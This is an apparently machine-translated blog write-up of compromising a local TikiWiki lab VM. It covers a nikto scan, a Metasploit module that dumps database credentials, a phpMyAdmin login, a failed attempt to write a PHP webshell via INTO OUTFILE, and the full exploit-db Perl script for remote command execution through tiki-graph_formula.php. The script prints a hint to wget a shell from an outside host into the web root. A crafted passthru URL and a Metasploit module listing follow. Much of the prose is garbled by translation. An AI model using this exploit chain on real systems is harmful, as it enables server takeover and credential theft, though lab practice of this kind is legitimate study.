Categories
Uncategorized

tiki-graph_formula.php code execution vulnerability reproduction (maybe ??)

1. I do not know where to turn out of the virtual machine image (do not know when to appear in the disk inside)

Drone Mirror: https: //pan.baidu.com/s/1ZgW8WaqXp8ULJbKCSgauFg

Extraction code: 1y8f

Open the configuration about this thing is tikiwiki

2. meet new stuff can not help curiosity, open nikto scanned it and found some strange things

Would have no hope at all, really did not expect scanned, and there are a phpinfo.php, a phpMyAdmin, seems to be a vulnerability TikiWiki

3.Metasploit

Open msf, search it tikiwiki

Five payload, one by one test

use auxiliary/admin/tikiwiki/tikidblib               #载入这个poc
set RHOSTS  192.168.5.129

# Drone IP show options # to see if there is an error run # attack

Successful attack? (Ah, really successful, a bit simple overdone), where to get the database user name and password, including the database name

4.phpMyAdmin

Password use of attack obtained, Gordon about to try, successfully landing

5.getshell && mysql wrote Ma

Because here it directly to the root account (Dba), and therefore can be directly entered, and write a sentence

写shell        INTO OUTFILE/DUMPFILE
SELECT '' INTO OUTFILE '/var/www/tikiwiki/cmd.php';

Tried, do not go to write, you can not create file error

 

 

I intend to write log backups, and found that, as shown below

 

wtf ?, Without this variable?

And then see if there is written permission

SHOW VARIABLES LIKE 'secure_file_priv';

 

 

Excerpt: https: //blog.csdn.net/Auuuuuuuu/article/details/83690362

Discovery, you can write, but NMD, Why?

 

5. anxious

phpMyAdmin3.0 (exploit / unix / webapp / phpmyadmin_config) vulnerabilities also tried, to no avail.

Turn to go behind the scan results nikto

 

Here clearly a code injection may be performed phpinfo ()

Baidu turned waited a long time, the problem lies in the tiki-graph_formula.php here, and she found a exp

 

Generally looked down

 

 

There seems to be using the passthru () command to be executed

Complete exp

Link address: https: //www.exploit-db.com/exploits/4525

#!/usr/bin/perl
# TikiWiki <= 1.9.8 Remote Command Execution Exploit
#
# Description
# -----------
# TikiWiki contains a flaw that may allow a remote attacker to execute arbitrary commands. 
# The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input 
# supplied to the f variable, which may allow a remote attacker to execute arbitrary PHP 
# commands resulting in a loss of integrity.
# -----------
# Vulnerability discovered by ShAnKaR 
#
# $Id: milw0rm_tikiwiki.pl,v 0.1 2007/10/12 13:25:08 str0ke Exp $

use strict;
use LWP::UserAgent;

my $target = shift || &usage();
my $proxy = shift;
my $command;

&exploit($target, "cat db/local.php", $proxy);

print "[?] php shell it?\n";
print "[*] wget http://www.youhost.com/yourshell.txt -O backups/shell.php\n";
print "[*] lynx " . $target . "/backups/shell.php\n\n";

while()
{
	print "tiki\# ";
	chomp($command = );
	exit unless $command;
	&exploit($target, $command, $proxy);
}

sub usage()
{
	print "[?] TikiWiki <= 1.9.8 Remote Command Execution Exploit\n";
	print "[?] str0ke \n";
	print "[?] usage: perl $0 [target]\n";
	print "    [target] (ex. http://127.0.0.1/tikiwiki)\n";
	print "    [proxy] (ex. 0.0.0.0:8080)\n";
	exit;
}

sub exploit()
{
	my($target, $command, $proxy) = @_;

	my $cmd = 'echo start_er;'.$command.';'.'echo end_er';
	
	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

	my $conn = LWP::UserAgent->new() or die;
	$conn->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
	$conn->proxy("http", "http://".$proxy."/") unless !$proxy;
	
	my $out=$conn->get($target."/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru($byte).die()&t=png&title=");

	if ($out->content =~ m/start_er(.*?)end_er/ms) {
		print $1 . "\n";
	} else { 
		print "[-] Exploit Failed\n";
		exit;
	}
}

# milw0rm.com [2007-10-12]

 7.Getshell

Code execution vulnerability exists, then modify payload

http://192.168.5.129//tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.passthru('whoami').die()&t=png&title=http://cirt.net/rfiinc.txt

 

 

One problem is that there can only execute a single command, the input parameters of the order, personally think we should put the command into a bit stream (on exp is so roughly handled)

Finally, make up, this module I found msf above

Matching Modules
================

   #  Name                                             Disclosure Date  Rank       Check  Description
   -  ----                                             ---------------  ----       -----  -----------
   0  exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  Yes    TikiWiki tiki-graph_formula Remote PHP Code Execution

Leave a Reply